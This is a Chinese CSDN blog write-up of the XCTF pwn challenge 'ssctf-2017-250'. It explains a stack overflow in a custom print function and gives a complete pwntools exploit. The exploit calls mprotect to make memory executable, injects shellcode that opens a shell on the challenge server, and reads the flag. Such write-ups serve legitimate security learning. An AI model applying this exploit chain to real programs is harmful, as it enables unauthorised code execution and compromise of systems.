[XCTF-pwn] 29-ssctf-2017-250

最新推荐文章于 2023-07-13 10:49:30 发布
最新推荐文章于 2023-07-13 10:49:30 发布
阅读量194 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123378590
版权

缓冲区溢出 mprotect shellcode 程序安全 exploit
关键词由CSDN通过智能技术生成

静态编译,pie未开,有mprotect

程序貌似无任何问题

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp-Ch] [ebp-24h]
  char v5; // [esp-Ch] [ebp-24h]
  int v6; // [esp+Ch] [ebp-Ch] BYREF

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  printf("SSCTF[InPut Data Size]", v4);
  _isoc99_scanf("%d", &v6);
  temp = malloc(v6);
  printf("SSCTF[YourData]", v5);
  read(0, temp, v6);
  puts("[Ok!]");
  print(temp, v6);
  return 0;
}

问题在print函数,这个不是标准函数是自己写的,有明显的溢出,输入长度58+5就能溢出到返回地址。

int __cdecl print(int a1, int a2)
{
  char v3[58]; // [esp+Eh] [ebp-3Ah] BYREF

  memcpy(v3, a1, a2);
  return puts(v3);
}

由于没有libc也就找不到system,用mprotect将段设置为可执行,再执行shellcode

完整exp:

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('111.200.241.244', 59142) 

elf = ELF('./pwn')
context(arch='i386', log_level='debug')

def send_data(pay):
    p.sendlineafter(b"SSCTF[InPut Data Size]", str(len(pay)).encode())
    p.sendafter(b"SSCTF[YourData]", pay)

'''
int __cdecl print(int a1, int a2)
{
  char v3[58]; // [esp+Eh] [ebp-3Ah] BYREF   return: 0x3a+4
  memcpy(v3, a1, a2);
  return puts(v3);
}
'''

padding = 0x3e
stack   = 0x08049000
pop_eax = 0x080b89e6 # pop eax ; ret
pop_edi = 0x08048480 # pop edi ; ret
pop_esi = 0x08048433 # pop esi ; ret
pop_edx = 0x0806efbb # pop edx ; ret
push_esp= 0x0806f2e8 # push esp ; ret

payload1 = b'A'*padding + flat(elf.sym['mprotect'], elf.sym['main'], stack, 0x1000, 7) #mprotect(stack,0x1000,7),main
send_data(payload1)

shellcode = asm(shellcraft.sh())
payload2 = b'A'*padding + flat(elf.sym['read'], stack, 0, stack, len(shellcode)) #read(0,stack,N),stack
send_data(payload2)

p.send(shellcode)

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
专栏目录
算法分析:2019_UNCTF一道逆向题目
m0_64973256的博客
03-17 469
一.下载程序得到查壳得到一个64位的elf文件 二.直接拖进IDA进行静态分析 一拖进IDA便看到了main函数中一些关键字符“You are Right”、“flag{.....}” int __cdecl main(int argc, const char **argv, const char **envp) { char s[240]; // [rsp+0h] [rbp-1E0h] BYREF char v5[240]; // [rsp+F0h] [rbp-F0h] BYREF
一道简单的smc自解密题目
m0_62690279的博客
03-27 1080
一道简单的smc自解密题目 攻防RE_BABYRE 64位elf,拉入ida 打开main函数 int __cdecl main(int argc, const char **argv, const char **envp) { char s[24]; // [rsp+0h] [rbp-20h] BYREF int v5; // [rsp+18h] [rbp-8h] int i; // [rsp+1Ch] [rbp-4h] for ( i = 0; i <= 181; ++i )
2022CTF培训(六)逆向题目选讲
sky123博客
12-08 1268
分析可知,函数首先调用 sub_4017C0 初始化 v4 数组,之后根据 v4 数组中的内容依次调用 funcs_4018AB 数组中的函数对输入的 1 到 32 字节进行变换。通过改变断点位置可以判断出,该函数表中 sub_B232A0 函数的前一个函数 sub_AD1000 同样存在反调试。必然会触发除零异常,因此会执行 loc_4010BE 处的代码,将局部变量 a0 和 a1 分别异或 dword_41F038 和 dword_41F03C。并用魔改的 tea 对其进行加密。
BUUCTF pwn wp 86 - 90
fa1c4的blog
01-17 650
mrctf2020_shellcode_revenge 一道经典题目, 可见字符shellcode. F5失败直接读汇编 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near buf= byte ptr -410h var_8= dword ptr -8 var_4= dword ptr -4 ; __unwi
windows pwn
sky123博客
07-13 1715
附件下载链接程序保护如下,没有开 GS 保护。 程序是一个简单的栈溢出: 利用方法如下:这里有几个易错点: 64 位栈溢出 附件下载链接 和 32 位的程序相似,不过这里溢出字节数较少,需要栈迁移。 ORW 如果题目开启了 保护禁用了 ,那么我们就需要采用 ORW 的方式获取 flag 。Windows 中的 ORW 示例代码如下,其中 和 位于 , 位于 。 由于传递的参数过多 gadget 不好找并且会导致 ROP 过长,因此采取 修改内存属性写 shellcode 的方式 进行 OR
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 648
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 364
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1656
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1854
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 1926
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
BUUCTF Pwn 1-12题解析及答案
红叶的博客
02-28 1567
这里使用fmtstr_payload直接替换 atoi_got 的原因是got表才是程序运行时函数的真正地址,通过替换atoi,修改为system,再送入'/bin/sh\x00' 即可成功getshell。s 的大小是0x3C,那么我们只需要输入 0x3C,也就是60 / 3 个I即可溢出,之后的内容我们可以就可以构建ROP链。也就是说,我们最多输入32个字节的东西,根据上文,我们可以输入32个I,这样就是32个you,也就是96个字节。0x0F + 0x08 代表 s 的大小加上8字节大小的rbp。
攻防世界REVERSE新手题解答
liucc09的博客
11-25 995
csaw2013reversing2 程序分析 使用IDA打开程序,F5键利用HexRay工具生成可读代码如下: int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // ecx CHAR *lpMem; // [esp+8h] [ebp-Ch] HANDLE hHeap; // [esp+10h] [ebp-4h] hHeap = HeapCreate(0x40000u
[ctf.show.reverse] 数学不及格
weixin_52640415的博客
04-14 782
主要函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+14h] [rbp-4Ch] char *endptr; // [rsp+18h] [rbp-48h] BYREF char *v6; // [rsp+20h] [rbp-40h] BYREF char *v7; // [rsp+28h] [rbp-38h] BYREF char *v8; // [rsp+30
逆向工程实验——lab5(C语言和windows逆向)
Onlyone_1314的博客
01-15 2160
实验五第1题 CraMe1.exe第(1)问:修改exe使得出现成功提示第(2)问:不修改exe输入正确的密码达到成功的目的第2题 Exe: super_mega_protection.exe第(1)问:(简单)在任何调试器的帮助下,强制程序接受更改后的密钥文件第(2)问:(中等)您的目标是将用户名修改为另一个用户名,而不需要修补程序。题外话:第3题(选做)Reverseme1.exe第(1)问:窗体中有一个隐藏按钮,将它显示出来并起作用第(2)问:按F7功能键,显示出这个消息框。步骤1、输入表添加Regi
buu题解-[ACTF新生赛2020]usualCrypt
m0_73393932的博客
02-25 418
逆向
[NPUCTF2020]Baby Obfuscation
m0_46296905的博客
05-02 618
题目:[NPUCTF2020]Baby Obfuscation 64位无壳程序 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax int v4; // ebx int v5; // esi int v6; // ebx int v7; // ebx int v8; // esi int v9; // ebx int v10; // ebx int v11;
逆向题解二
admin的博客
09-12 2843
MoeCTF新生赛逆向A_game step1: 先探探这个exe的底 拉到die里头。发现是个64位程序。 step2:拉到IDA64里面反编译瞅瞅源码 按F5,反编译的源码如下。 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ...
BUUCTF pwn wp 11 - 15
fa1c4的blog
08-17 453
ciscn_2019_n_8 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] var[13] = 0; var[14] = 0; init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5);
[MRCTF2020]Shit
sky123博客
01-18 915
main函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax int v4; // eax char v5; // al int v6; // eax int v7; // eax int v8; // eax char v10[52]; // [esp+4h] [ebp-38h] BYREF v3 = sub_401890(); std::ostream
guess-xsctf
最新发布
07-28
- *1* [xctf攻防世界 REVERSE 高手进阶区 Guess-the-Number](https://blog.csdn.net/l8947943/article/details/124064262)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值